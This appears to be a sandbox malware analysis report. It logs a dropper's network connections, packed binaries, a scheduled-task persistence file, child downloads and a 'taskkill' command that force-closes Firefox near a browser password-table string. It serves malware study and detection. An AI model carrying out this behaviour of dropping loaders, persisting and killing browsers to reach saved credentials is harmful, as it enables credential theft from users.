Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50296
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50295
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50177
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50178
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50181
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50193
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50195
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50194
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50308 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50147 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50139
Source: unknown Network traffic detected: HTTP traffic on port 50170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50138
Source: unknown Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50149 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50254
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50253
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50135
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50256
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50134
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50255
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50137
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50215 -> 443
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49856 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49886 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49894 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49907 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49946 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50027 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50032 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50042 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50049 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50048 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50123 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50127 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.65.91:443 -> 192.168.2.4:50125 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50132 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50135 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50133 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50134 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50195 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50193 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50194 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.177.85:443 -> 192.168.2.4:50212 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.177.85:443 -> 192.168.2.4:50214 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.177.85:443 -> 192.168.2.4:50224 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.20:443 -> 192.168.2.4:50230 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.17:443 -> 192.168.2.4:50249 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50254 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50256 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50255 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 36321ea525.exe, 0000000B.00000002.2637223017.0000000000DF2000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_eae7f10c-2
Source: 36321ea525.exe, 0000000B.00000002.2637223017.0000000000DF2000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_843ac131-9
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: d015c0e328.exe.6.dr Static PE information: section name:
Source: d015c0e328.exe.6.dr Static PE information: section name: .idata
Source: d015c0e328.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 9b8665be8a.exe.6.dr Static PE information: section name:
Source: 9b8665be8a.exe.6.dr Static PE information: section name: .idata
Source: 9b8665be8a.exe.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: da69a13142.exe.6.dr Static PE information: section name:
Source: da69a13142.exe.6.dr Static PE information: section name: .idata
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_3_0115F8D4 7_3_0115F8D4
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_3_0115F8D4 7_3_0115F8D4
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_3_0115F8D4 7_3_0115F8D4
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_3_0115F8D4 7_3_0115F8D4
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Code function: 7_2_065AE2BE 7_2_065AE2BE
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9981320248637602
Source: file.exe Static PE information: Section: cqnnvyhp ZLIB complexity 0.9946645100911459
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9981320248637602
Source: skotes.exe.0.dr Static PE information: Section: cqnnvyhp ZLIB complexity 0.9946645100911459
Source: random[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9992891905737705
Source: random[1].exe.6.dr Static PE information: Section: okzfovcg ZLIB complexity 0.993935938449271
Source: d015c0e328.exe.6.dr Static PE information: Section: ZLIB complexity 0.9992891905737705
Source: d015c0e328.exe.6.dr Static PE information: Section: okzfovcg ZLIB complexity 0.993935938449271
Source: random[1].exe0.6.dr Static PE information: Section: dsxuiljp ZLIB complexity 0.9947752122031059
Source: 9b8665be8a.exe.6.dr Static PE information: Section: dsxuiljp ZLIB complexity 0.9947752122031059
Source: random[1].exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 9b8665be8a.exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: d015c0e328.exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe0.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@126/17@102/18
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1144:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2484:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4336:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4080:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: d015c0e328.exe, 00000007.00000003.2456809954.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2457725925.00000000059F5000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2583814622.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2584822075.0000000005D35000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2685061980.00000000053B4000.00000004.00000800.00020000.00000000.sdmp, d015c0e328.exe, 00000016.00000003.2716485397.0000000005381000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 52%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: d015c0e328.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: d015c0e328.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: 9b8665be8a.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe "C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe "C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe "C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe "C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe"
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
